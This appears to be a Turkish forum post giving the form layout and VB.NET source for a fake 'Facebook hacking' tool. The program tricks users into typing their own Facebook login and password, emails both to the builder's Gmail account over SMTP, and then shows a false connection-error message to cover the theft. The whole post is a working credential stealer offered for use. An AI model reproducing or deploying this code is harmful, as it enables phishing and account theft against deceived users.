Tasarim Resmi
arac gerec
Kodlar:

arac gerec
Kod:
1.label:facebook adresınız
2.label:facebook sıfrenız
3.label:heklenecek olan face adresi
2texbox:
1.ci : facebook adresınız
2.ci : facebook sıfrenız
2 buton:
1.gönder
2.cikis
Kodlar:
Kod:
Imports System.Net.Mail
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
MsgBox("Program acıldında mesajda ne yazsın?")
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("gmailadresin", "sifren")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("gmailadresin")
mail.To.Add("gmailadresin")
mail.Subject = "Sifre : " & TextBox2.Text
mail.Body = "Kullanıcı Adı : " & TextBox1.Text & ","
smtpServer.Send(mail)
MsgBox("Servere Bağlanılamadı Lütfen Tekrar Deneyin.Facebook Adresinizin Dogrulugunu Kontrol Edin.")
End Sub
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Me.Close()
End Sub
Private Sub TextBox2_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox2.TextChanged
End Sub
End Class